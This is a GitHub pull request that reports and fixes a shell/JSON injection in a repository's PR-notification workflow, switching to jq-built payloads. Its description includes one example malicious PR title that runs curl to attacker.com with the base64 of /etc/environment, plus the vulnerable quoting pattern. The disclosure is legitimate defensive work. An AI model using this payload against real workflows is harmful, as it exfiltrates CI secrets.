Skip to content

fix(security): prevent shell/JSON injection via PR title in Chat notification workflow#606

Open
XananasX7 wants to merge 1 commit into
google:mainfrom
XananasX7:fix/security-shell-injection-pr-title
Open

fix(security): prevent shell/JSON injection via PR title in Chat notification workflow#606
XananasX7 wants to merge 1 commit into
google:mainfrom
XananasX7:fix/security-shell-injection-pr-title

Conversation

@XananasX7

Copy link
Copy Markdown

Summary

The pr_notification.yml workflow uses PR title and labels with the pattern '"'"$TITLE"'"' inside a shell-constructed JSON string — a shell/JSON injection vector.

Vulnerability

TITLE: ${{ github.event.pull_request.title }}
...
"content": "'"$TITLE"'"  # ← directly interpolated in shell JSON

A PR with a title containing a single quote (') or other shell metacharacters can:

  1. Break out of the JSON string, poisoning the webhook payload
  2. Potentially execute arbitrary shell commands if the injection reaches a subshell expansion

Example malicious PR title: '; curl https://attacker.com/$(cat /etc/environment | base64); echo '

Fix

Extract all untrusted event values into env vars and build the JSON payload with jq, which properly escapes all special characters. This is the standard safe pattern for constructing JSON payloads from untrusted input in shell scripts.

…on workflow

The pr_notification.yml workflow used PR title and labels with the
pattern '"'"$TITLE"'"' inside a JSON string — a classic shell/JSON
injection vector. A PR with a title containing single quotes breaks
out of the JSON, allowing arbitrary data injection into the webhook
request body (e.g. replacing the WEBHOOK_URL value or injecting
unexpected JSON fields).

Fix: extract all untrusted values into env vars and build the JSON
payload with jq, which properly escapes all special characters.
@google-cla

google-cla Bot commented Jun 28, 2026

Copy link
Copy Markdown

Thanks for your pull request! It looks like this may be your first contribution to a Google open source project. Before we can look at your pull request, you'll need to sign a Contributor License Agreement (CLA).

View this failed invocation of the CLA check for more information.

For the most up to date status, view the checks section at the bottom of the pull request.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant